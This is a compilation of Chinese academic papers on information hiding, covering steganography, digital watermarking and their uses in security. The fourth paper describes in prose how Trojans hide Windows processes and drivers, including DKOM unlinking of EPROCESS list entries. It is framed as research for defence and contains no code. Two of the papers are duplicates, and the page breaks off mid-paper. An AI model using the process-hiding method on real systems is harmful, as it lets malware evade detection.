线上期刊服务咨询,发表咨询:400-808-1701 订阅咨询:400-808-1721

隐藏技术论文8篇

时间:2023-03-27 16:39:41

隐藏技术论文

隐藏技术论文篇1

[关键词] 信息隐藏信息安全电子商务数据保密防伪

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如DES),还是安全性更高的公开密钥系统(RSA),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(Information Hiding),也称作数据隐藏(Data Hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、图像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、图像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在图像中的应用即遮掩消息选用数字图像的情况为例进行说明。

在图像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变图像元素的值,一般是在图像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the Least Significant Bits,LSB)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的LSB直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。LSB算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对图像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改图像的叠像技术(LSM);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将图像用频域表示,通过更改图像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的图像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、DCT(低频分量)变换等。

二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在Internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

对于数据完整性的验证是要确认数据在网上传输或存储过程中并没有被窜改,可通过使用脆弱水印技术保护的媒体一旦被窜改就会破坏水印,从而很容易被识别。

三、隐藏技术的未来发展

隐藏技术论文篇2

关键词:信息安全,信息隐藏

 

一、关于信息隐藏

所谓的信息隐藏,是利用媒体信息普遍存在的冗余特性,将秘密信息隐藏在其他媒体信息中,其首要目标就是使加入隐藏信息后的媒体目标的质量下降,尽可能地小,使人无法觉察到隐藏的数据,或者知道它的存在,但未经授权者无法知道它的位置。并不像传统加密过的文件一样,看起来是一堆会激发非法拦截者破解机密资料动机的乱码,而是看起来和其它非机密性的一般资料无异,因而十分容易逃过非法拦截者的破解。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于环境中,免于被天敌发现而遭受攻击。被人们誉为历史学之父的古希腊历史学家希罗多德(Herodotus, 486―425),在其著作中讲述了这样一则故事:一个名叫Histaieus的人筹划着与他的朋友合伙发起叛乱,里应外合,以便推翻波斯人的统治。他找来一位忠诚的奴隶,剃光其头发并把消息刺在头皮上,等到头发又长起来了,把这人派出去送“信”,最后叛乱成功了。

信息隐藏技术是20世纪90年代中期从国外兴起的一门集多学科理论与技术与一身的新兴技术领域,它涉及感知科学、信息论、密码学等多个学科领域,涵盖信号处理、扩频通信、图像处理等多种专业技术的研究方向。

人的眼睛或耳朵本身对某些信息都有一定的掩蔽效应,利用人的这些特点,可以很好地将信息隐藏而不被察觉。信息隐藏过程一般由密钥来控制,通过嵌入算法将有意义的信息即嵌入对象隐藏于掩护对象中,从而生成隐密载体,隐密载体通过信道传输到接受端。在密钥的控制下采用特定的提取算法从隐藏载体中提取出嵌入对象,利用密钥从中恢复或检测出隐藏的秘密信息,从而使用户获得真实可靠的信息。使非法者不知道这个载体信息中是否隐藏了其它的信息,而且即使知道,也难以提取隐藏的信息,从而实现信息的保密。

据目前已经提出的信息隐藏算法,从它们对载体的修改方式上进行分类,可以分为:时域(空域)替换技术、变换域技术、扩展频谱技术、统计方法等等。

二、信息隐藏的特点

利用不同的媒体进行信息掩藏时有着不同的特点,但是它们都必须具有下列基本特征。

1.隐蔽性。指嵌入信息后在不引起秘密信息质量下降的前提下,不显著改变掩护对象的外部特征,即不引起人们感官上对掩护对象变化的察觉。以使非法拦截者无法判断是否有秘密信息的存在。

2.不可测性。指隐蔽载体与原始载体具有一致的特性,即非法拦截者要检测到秘密信息的存在并提取出来应相当困难,至少在秘密信息的有效期内是不可能的。

3.不可见性。利用人类视觉系统和听觉系统的属性,经过一系列隐藏处理, 使目标资料没有明显的降质现象,而隐藏的资料却无法人为地看见或听见.

4.鲁棒性。指不因图像文件的某种改动而导致隐藏信息丢失的能力。这里所谓“改动”包括传输过程中的隐藏载体对一般的信号处理(如滤波、增强、重采样、有损压缩等)、一般的几何变换(如平移、旋转、缩放、分割等)和恶意攻击等情况,即隐藏载体不会因为这些操作而丢失了隐藏的秘密信息。

5.自恢复性。论文大全。指经过了一些操作和变换后,可能会使隐蔽载体受到较大的破坏,如果只留下部分的数据,在不需要宿主信号的情况下,却仍然能恢复隐藏信息的特征就是所谓的自恢复性。

6.安全性。指隐藏算法有较强的抗攻击能力,即它必须能够承受一定程度的人为攻击,而使隐藏信息不会被破坏。

三、信息隐藏的应用

在信息安全领域中,信息隐藏技术的应用可归结为下列几个方面。

1.数字知识产权保护

知识产权保护是信息隐藏技术中数字水印技术和数字指纹技术所力图解决的重要问题,信息隐藏技术的绝大部分研究成果都是在这一应用领域中取得的。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多,如数字图书馆、数字图书出版、数字电视、数字新闻等。这些服务提供的都是数字产品,数字产品具有易修改、易复制、易窃取的特点,因此,当前的数字知识产权保护就已经成为迫切需要解决的实际问题。

信息隐藏技术应用于版权保护时,所嵌入的签字信号通常被称作“数字水印”,数字水印技术可以成为解决此难题的一种方案。现在越来越多的视频信号、音频信号和数字图像中被贴上了不可见的标签,用以防止非法拷贝和数据跟踪。服务提供商在向用户发送产品的同时,将双方的信息代码以水印的形式隐藏在作品中,这种水印从理论上讲应该是不被破坏的。论文大全。当发现数字产品在非法传播时,可以通过提取出的水印代码追查非法散播者。其主要特点是版权保护所需嵌入的数据量小,对签字信号的安全性和鲁棒性要求很高。

2.数据完整性鉴定

使用数字水印技术有一定的缺陷,用于数字水印技术保护的媒体一旦被篡改水印就会被破坏,从而很容易被识别。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。数据完整性鉴定是指对某一信号的真伪或完整性的判别,并需要进一步指出该信号与原始真实信号的差别,以确认资料在网上传输或存储过程中并没有被篡改、破坏或丢失。假定接收到一个如音频、视频或图像等多媒体信号,并初步判断它很可能是某一原始真实信号的修改版本,数据篡改验证的任务就是在对原始信号的具体内容不可知的情况下,以最大的可能判断是否是真实的。首先,要充分利用数据库管理系统提供的数据完整性的约束机制和各种输入数据的引用完整性约束设计,以便保证数据完整、准确的输入和储存。其次,在数据传输过程中可视情况选用相应的数据校验方式对传输数据进行校验检查。

3.数据保密

在网络上传输秘密数据要防止非法用户的截获和使用,这是网络安全的一个重要内容,随着信息技术的发展以及经济的全球化,这一点不仅涉及政治、军事领域,还将涉及到商业、金融机密和个人隐私。信息隐藏技术为网上交流的信息采取了有效的保护,比如电子政务中敏感信息、电子商务中的秘密协议和合同、网上银行交易的重要数据、重要文件的数字签名以及个人隐私等,还可以对一些不愿为别人所知道的内容使用信息隐藏方式进行隐藏储存,从而使数据得到保密,保证了信息的安全性。论文大全。

4.资料不可抵赖性的确认

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到对方的信息,这是交易系统中一个重要环节。这可以使用信息隐藏技术,在交易体系的任何一方发送和接收信息时,将各自的特征标记形式加入到传递的信息中,这些标记应是不能被去除的,从而达到确认其行为的目的。

结论

总之,信息隐藏技术是多媒体通信和多媒体信号处理领域中近年来新兴的研究方向,它为信息安全提供了一种新的思路,为我们研究信息安全提供了一个新的方向.

目前国际上先进的信息隐藏技术已能做到隐藏的信息可以经受人的感觉检测和仪器的检测,并能抵抗一些人为的攻击。但总的来说,信息隐藏技术尚没有发展到可实用的阶段,使用密码加密仍是网络信息传输的主要安全手段。虽然目前对信息隐藏的研究有了很大的进展,在信息安全中起到了重要的作用,但存在大量的实际问题亟待解决,如信息隐藏的容量问题,如何建立不可感知性的数学度量模型,信息隐藏的容量上界如何计算等;信息隐藏的对立面――隐藏分析如何得到同步发展;如何对信息隐藏进行分析和分类;如何找到信息隐藏技术自己的理论依据,形成完善和科学的理论体系等等。

信息隐藏是一项崭新的技术领域,也是多媒体技术、网络技术研究的前沿,应用前景十分广阔,必将吸引广大图像、语音、网络、人工智能等领域的研究者加入到这一行列,从而推动信息安全技术更快的发展。

参考文献:

[1] 张作林,陈建华.基于区域的信息隐藏技术[J].福建电脑,2005,3.

[2] 张书真.信息安全中的信息隐藏技术[J].电脑知识与技术.2005,18.

[3] 陈 波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程.2005,2.

[4] 左伟明,秦姣华.信息隐藏技术研究[J].湖南城市学院学报.2005,3.

[5] 江早.信息隐藏――种崭新的信息安全技术[J].中国图象图形学报.2005,2.

隐藏技术论文篇3

[关键词] 信息隐藏信息安全电子商务数据保密防伪

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如DES),还是安全性更高的公开密钥系统(RSA),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(Information Hiding),也称作数据隐藏(Data Hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、图像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、图像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在图像中的应用即遮掩消息选用数字图像的情况为例进行说明。

在图像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变图像元素的值,一般是在图像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the Least Significant Bits,LSB)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的LSB直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。LSB算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对图像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改图像的叠像技术(LSM);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将图像用频域表示,通过更改图像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的图像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、DCT(低频分量)变换等。

二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在Internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

对于数据完整性的验证是要确认数据在网上传输或存储过程中并没有被窜改,可通过使用脆弱水印技术保护的媒体一旦被窜改就会破坏水印,从而很容易被识别。

三、隐藏技术的未来发展

隐藏技术论文篇4

关键词:进程隐藏 Windows server 2008 DKOM技术 WDM驱动编程

中图分类号:TP3 文献标识码:A 文章编号:1007-9416(2013)03-0110-02

1 引言

Windows Server 2008是专为强化新一代IPv6网络、应用程序和Web服务的功能而设计的服务器系统。该系统虽是建立在Windows Server先前版本的成功与优势上,但是也因此继承了Windows系列操作系统的一些可能被病毒所利用的传统特征,如进程隐藏机制。所谓进程隐藏就是在用户不知情的情况下悄悄执行自己的代码。恶意代码通常通过隐藏自身进程信息,在用户察觉不到的情况下植入破坏性代码或窃取用户保密信息。进程隐藏,一直是病毒、木马程序设计者不断探求的重要技术,因为这些进程都需要很好的隐藏和保护自身信息。

当前,伴随着Windows服务器系统功能的日益发展与完善,木马技术也紧跟发展,使得木马在系统中更具隐藏性,更具危害性。本文在此背景下研究进程隐藏机制,将有助于进一步了解和掌握木马技术的发展方向,有助于采取更有力的应对措施。了解进程隐藏技术,是开发防病毒和木马软件的基础,同时也助于促进信息安全技术的发展。

有些情况下,进程隐藏也是某些类型程序所需要的功能,如某些系统安全控制程序,例如网络流量监控系统,这种程序需要在服务器系统中长驻,不能随意停止和卸载,这则要求进程能有效保护和隐藏自己,以防止用户恶意删除和卸载。在当前企业中要求提供高度安全的网络基础架构,以提高和增加技术效率与价值的大趋势下,分析此背景下木马实现的关键技术,必将具有重要的的现实意义。

2 Windows系列操作系统中的进程隐藏技术

进程是程序运行的基础,因此检查进程也就成了查杀木马的关键环节,所以,对木马设计者而言,成功隐藏自己的进程信息,就是其最重要的基础工作。随着木马技术的不断发展,进隐藏技术也在不断发更新。

进程隐藏技术在不断的发展中,在Win NT架构服务器时代,第一代进程隐藏技术就已经出现。早在Windos 98系统当中,微软公司就提供了一种将进程注册为服务的方法,这种技术称为Pegister Service Process。

由于这种隐藏技术存在严重的版本限制性,从而引发了第二代进程隐藏技术的研究,称之为进程插入。利用的技术有DLL插入技术、远程线程插入技术等,这种隐藏技术较之第一代更为高级和隐藏。继进程插入技术之后,新的进程隐藏技术又飞速发展,称为HOOK API技术。Windows系统给开发人员提供了几种列出系统中所有的进程、模块与驱动程序的方法,最常见的也是最常用的方法就是调用系统API;Create Tool Help 32 Snapshot、Enum Process、Enum Process Modules等,它们是获取进程列表的第一层手段,调用这几个API函数,就可以得带系统当前运行进程的返回列表。

这几个API在接到请求后会调用ZW Query System Information,Zw Query Ststem Information,会调用Ki System Service切入内核进入ring0权限,然后自SSDT表(System Service Descriptor Table,系统服务分配表)中查得Nt Query System Information的地址,并调用其指向的实际代码,其运行原理是从系统的数据结构中取相应的数据,再返回给调用者。

在此过程中,在任何一个环节上进行拦截都可以实现隐藏进程的目的,在切入内核进入root0权限前进行HOOK,称为用户模式HOOK,而在之后进行HOOK则是内核模式HOOK,后者需要驱动才能实现。它比前几种技术更为成熟。这种技术使得木马不必将自己插入到其他进程中,即可实现自身信息的隐藏。

更为高级的技术是DKOM―直接内核对象修改技术,是由木马程序将自身的进程信息从Windows服务器系统用以记录进程信息的“进程链表”中删除,这样进程管理工具就无法从“进程链表”中获得木马的进程信息。Windows服务器系统枚举进程使用的是活动进程列表Ps Active process list,所有结点通过EPROCESS结构中的Active Process Links 双向指针链在一起。EPROCESS结构中有个双向链表LIST_ENTRY结构,这个结构有两个DWORD指针成员FLINK和BLINK,这两个指针分别指向当前进程的前一个和后一个进程。要隐藏某个进程,只需修改对应ERPOCESS的Active Process Links,将其从链表中摘除。只要把当前进程的前一个进程的BLINK指向当前进程后一个进程的FLINK,再把当前进程后一个进程的FLINK指向当前进程前一个进程的FLINK。由于系统执行线程调度使用的是其他的数据结构,因此这种修改不会影响进程运行。

3 对DKOM进程隐藏技术的模拟与验证

在研究的各种进程隐藏技术中,最有效的是DKOM(Direct Kernel Object Manipulation,DKOM 直接内核对象修改技术)。这种技术绕过了对象管理器,直接对内核对象进行操作,从而绕过了所有关于对象的访问检查,彻底实现了进程隐藏。由于这种技术直接操作内核对象,需要ring0的运行权限,所以必须通过WDM驱动开发来实现。

在实现过程中,作者首先配置了Windows Server 2008平台上的驱动开发环境;然后对验证程序进行了详细设计,明确每个模块需要实现的功能;最后针对不同的模块一一探寻实现机理,如在编码的过程中,反汇编了重要的内核函数Ps Get Current Process,并利用WinDBG等工具剖析了Windows内核中重要的数据结构,从而深入揭示了改函数返回当前进程结构EPROCESS的原因。

即使隐藏了进程信息,管理员通过查找驱动文件信息还是可能发现该进程。本研究在实现进程隐藏的基础上,进一步实现了驱动的隐藏,利用的原理也是直接内核修改,从加载的模块双向链表中摘除驱动信息。

4 结语

利用DKOM技术编码隐藏进程之后,利用Windows server 2008中的资源管理器、Process Explorer、EF Process Manager、Antiy Ports、Process Viewer、Proscan六种主流的进程查看工具分别进行查看,都没有查看到被隐藏的进程。研究结果表明,这种技术可以很好地实现隐藏。

研究进程隐藏技术对于信息安全领域有非常重要的作用,通过研究内核层面的进程隐藏机制可以保障主机多种安全,如限制内核模块的任意加载,防止黑客插入恶意模块传播病毒、留下后门、修改重要文件和销毁攻击痕迹,防止部分系统功能被非法终止等。研究进程隐藏机制可大大增强主机的安全性,使用户在使用工程中避免恶意代码的破坏。信息安全将是未来发展的一个重点,攻击和侦测都有一个向底层靠拢的趋势。未来病毒和反病毒底层化是一个逆转的事实,这些方面的研究可以在保护服务器内关键信息免遭黑客侵害、积极保护用户的数据的方面为研究人员提供宝贵的经验。

参考文献

[1]张新宇,卿斯汉,马恒太,张楠,孙淑华,蒋建春.特洛伊木马隐藏技术研究[J]. 通信学报. 2006(07).

[2]刘颖.Windows环境恶意代码检测技术研究[D].电子科技大学,2007.

隐藏技术论文篇5

关键词:信息隐藏;信息安全;应用

中图分类号:TN918.6

当今社会已经进入到了一体化的网络时代,网络成为最重要的传媒手段,各种信息都通过网络进行传播,包括个人信息、军事信息、私密信息等,如何在这种开放的环境中,最大程度保证信息的安全,是当下网络技术的热点话题。但是随着信息技术的发展,计算机处理信息的能力也有所增强,传统的秘钥不再能保证信息的绝对安全,因此数据的隐藏技术成为了热点,也是保护信息的重要手段。

1 信息隐藏技术概述

1.1 信息隐藏技术基本内涵。信息隐藏技术主要是将秘密信息隐藏在普通的文件中,并通过数字化的信号进行处理,这样通过对于用户的视觉冗余来进行隐藏,最大程度保证信息的安全性。隐藏后的信息会使媒体的搜索目标变小,甚至无法发现,这样秘密的信息和文件便可以通过这种形式来保护信息。信息隐藏技术目前应用比较广广泛,主要包括以下内容。首先是隐藏术,主要内容是进行秘密形式的通信,并且将信息藏匿与其他的普通信息中,信息隐藏主要是以第三方信息保护的形式,便于将信息传输到目的客户端。第二是数字水印,可以是作者的序列号、公司的标识等,主要是能证明被保护的信息或者文件可以被证明以及查询侵权的一种途径。第三是数据嵌入。在不同形式的信息中,技术模式吸取了隐藏术与水印的优势,并通过嵌入的方式对于秘密信息进行保护。第四是指纹与标签,是水印的一种特殊用途,水印的每个特定的信息可以进行信息的拷贝。

1.2 信息隐藏技术的特点。信息隐藏技术与传统的信息加密不同,基本目的并不是限制文件资料的提取与保存,而是将数据信息隐藏最小化。除此之外,信息隐藏技术还要充分考虑到信息在通过多种程序处理之后,仍然具备可以运行操作的性质,不会被破坏基础属性,因此信息隐藏技术需要具备以下特点。

(1)隐蔽性。信息隐藏的首要特性便是隐蔽性,主要指的是信息在嵌入之后,最大程度避免信息质量的改变,同时也能掩饰信息的基本特征,在传输过程中不会引起察觉,在视觉方面可以很好保护信息不被发现,保证原始信息的一致性。例如拥有相同的统计分布,这样变会混淆拦截者的信息判断能力,保证信息的安全;(2)安全性。隐藏技术需要具备较强的安全性能,可以有效避免黑客的侵袭与共计,最大程度保护隐藏信息的安全;(3)恢复性。被保护的信息会经过多重程序进行处理与改变,因此特性上会发生一定改变,如果原始信息受到了破坏,那么隐藏技术需要通过保存下来的信息来恢复原来的文件,这样保证传输的信息准确性。

2 信息隐藏的技术方法

2.1 替换技术。人的感官系统对于一些细小的变化比较敏感,因此替换技术的核心就在于改变这些被保护文件中秘密的细节部分,并不被非法用户注意。这种形式并不会影响被保护信息的性质,而且可以对于被保护信息进行编码程序,当前应用比较广泛的替换技术包括最低比例的一换技术、随机的替换技术、特定区域替换技术等等。

2.2 变换技术。绝大多数的信息隐藏技术都是通过正交变换域来实现的,由此可见变换技术核心是通过扩频技术和密码学原理,将被保护的信息嵌入到普通信息的变换域中,同时利用算法来进行信息的提取,转换为隐蔽的形式。这种变换技术充分利用了人体感官对于空间频率差异的敏感程度,进而改变被保护信息的性质,确保信息不被察觉。

2.3 扩频技术。被保护信息在进行隐藏的过程中,有可能会导致信息的破坏,甚至信息的消除,因此为了保护信息的原始特性,可以利用重复编码的形式来进行扩频。在被保护的信息中插入一个参数,确保信息在处理后仍然可以进行扩频,通常选择高速率的随机码来进行发送,而且这种信息数据自身的信号也可以完成扩展。

3 信息隐藏技术的应用

3.1 数字水印技术的应用。数字水印技术是信息隐藏技术最重要的一种形式,主要是通过在多媒体中插入不可感知的信息,因而实现对于信息的保护以及对于操作的记录、跟踪。

(1)版权保护。在数字水印技术的应用中,版权保护是最重要的内容,主要是将重要的版权信息嵌入到图像、音频、文本中,目的是进行区分、标识以及解释版权。在一些逐步实现数字化的行业,例如数字图书馆、数字新闻等,很多信息容易受到篡改,知识产权保护能力比较差,因此通过信息隐藏技术中的水印技术,既可以最大程度保持作品的原始性,又难以被非法用户进行篡改,通过特殊标识的嵌入,可以是数字、文字、图标,与原始文件的结合,不会严重破坏数据的功能,还能具备一定的商用价值。这种水印通常情况下是不可见的,特别是在涉及知识产权纠纷中,可以通过特定秘钥提取出水印,进而实现保护自主知识产权的目的;(2)指纹识别。通过数字水印技术可以在文件中标注出授权的单位以及特殊名称,通过文件的原始性保证在特殊处理之后以及用户的接受、存储之后,文件特性不会发生改变。因此如果在被保护文件通过隐藏技术传输之后,便可以标注的信息追踪到文件的相关责任人,这样对于调查、规则也有据可循。这种指纹识别的技术实质是一种跟踪功能,特别是在数字产品的应用中,版权人可以将不同用户的序列号进行处理,嵌入到这些合法的拷贝中,这样在出售合法的拷贝的时候,可以与嵌入的信息相对照,如果是非法的、未经授权的拷贝产品,版权人便可以通过指纹来追踪,进而找寻到泄密者。

3.2 隐藏通信技术的应用。隐藏通信技术主要是将被保护的秘密的信息、文件隐匿于某些普通的公开文件中,进而保证在传输过程中秘密信息的安全性。以隐藏载体形式的不同,可以划分为文本的隐藏、语音的隐藏和视频的隐藏等。在实践中主要应用于数据的保密,例如在电子商务中时常会涉及到一些重要的信息,如商业机密、秘密协议、金融交易等,这些重要的数据信息一旦泄露可能会为个人或者企业带来损失,因此防止非法用户中途拦截这些数据,便可以采用隐藏通信技术,将信息以隐藏的形式进行传输,有效避免非法用户的拦截,最大程度保证信息安全。

4 结束语

信息隐藏技术方式多样,应用灵活,在未来的信息保护中将会得到广泛应用,但是这种技术手段目前还在发展阶段,在理论体系方面还在不断趋于成熟与完善,特别是在现实应用中还有待于进一步优化,存在的问题亟待解决。例如数字水印模型的构建、抗攻击性的提升等等,在算法上也在逐步完善。信息隐藏技术作为一把双刃剑,在应用方面也要利用特征优势,更好地为当下的信息传输做贡献。

参考文献:

[1]戴跃伟.信息隐藏技术的理论及应用研究[D].南京理工大学,2012.

[2]刘洁.信息隐藏技术及应用[J].现代情报,2011.

[3]尹兰.基于文本的信息隐藏技术的研究[D].贵州大学,2007.

[4]高真.密文图像中的可逆信息隐藏算法研究[D].重庆大学,2013.

[5]特列克别克・米沙.一种新的信息隐藏算法的设计研究[D].电子科技大学,2013.

[6]韩敏,董俊磊.浅谈信息隐藏技术的理论及应用[J].黑龙江科技信息,2009(05).

隐藏技术论文篇6

关键词:图像加密;隐藏信息;识别

信息隐藏的概念在几千年前就已经存在,主要是对于想要传递的文字、图像、声音等信息进行隐藏工作。互联网技术发展迅速的今天,如何在信息的传输过程中保证信息安全性,并且保证图像等信息可以被接收人正常识别,已经成为研究的重要课题。

1 基于图像的信息隐藏检测技术

1.1 信息隐藏检测技术

1.1.1 攻击技术。攻击技术是指,认为的对隐藏图像信息进行攻击破坏,可以简单有效地使隐藏图像信息被损坏,使之无法被识别。这种方法对于破坏传输信息是极为有效地方法,要谨慎使用,很容易造成信息彻底被破坏掉。

1.1.2 检测技术要判断是否有隐藏图像信息,对信息进行检测是判断其是否存在的有效办法,既能保证信息完整性,有可以对隐藏信息进行有效识别。检测是对于隐藏的图像信息进行分析的首要步骤。

1.1.3 破解技术在发现隐层图像信息之后,要想得到隐藏的图像信息,就要应用破解技术对加密技术进行破解,难度最大,也是整个分析过程的核心工作。

1.2 信息隐藏检测技术

信息隐藏检测技术依照研究的客体不同可以分为两类,分别是:

a. 对比检测技术。这种技术主要是讲原始信息载体和隐藏后的信息载体进行对比,分析两者间像素的关联性,来实现隐藏信息检测。此种检测方式相对简单,但是由于原始载体获取不易,所以使用效果并不能理想。

b. 盲检测技术。这种技术不需要获取原始信息载体,主要是通过对于现有隐藏信息载体的自然数图像特征进行分析,判断其信息是都进行了隐藏,虽然这种技术对于技术水平的要求更高,但是应用效果也会更好。

信息隐藏检测技术依照研究角度不同还可以分为另外两种技术,分别是:

a. 时控域检测方法。这种检测方式是依据信息在时控域的嵌入方式不用来检测信息时候被隐藏的。这种检测方法在应用的时候检测方向单一,对于多种不同信息隐藏仅应用了一种统计方法。

b. 频率域检测方法。这种方法是对于图像信息在频率域中的表现特性不同,来进行隐藏图像分析的。利用这种特性可以检测图像信息是否有被嵌入隐藏信息。

信息隐藏检测技术依照检测特性还可以分为以下两种:

a. 基于签名的检测方法。这种方法是应用已知的检测工具,来进行隐藏信息分析。这种方法的优势是检测的准确率很高,并且还可以分析出隐藏信息使用的具体嵌入技术。但是对于未知的信息嵌入方式无法进行检测。

b. 基于系统的检测方法。这种方法主要通过改变数字图像的统计特性来进行检测工作,在实际应用过程中通过判断信息是否出现偏离,而确定信息的隐藏。这种方法对于一类图像的检测极为有效,较为通用。但是对于外界因素的影响阻挡较弱。

1.3 信息隐藏检测技术优劣衡量方式

无论是哪种信息隐藏检测技术,首要的都是抱着检测质量,只有保证隐藏信息检测的准确性才能进一步的对信息进行破解分析,获取隐藏信息,其次就是要注意检测的速度,一个需要几天几夜才能检测出隐藏信息的方法,就算保证了检测的准确性,但也不能说这种算法是好的、优质的。在网络信息传播如此快速的今天,速度在某种程度上也代表一切。

2 主流图像隐藏识别技术

现阶段,在图像隐藏中应用的识别技术主要有三种,分别是:

2.1 基于数字水印算法的图像隐藏信息识别技术

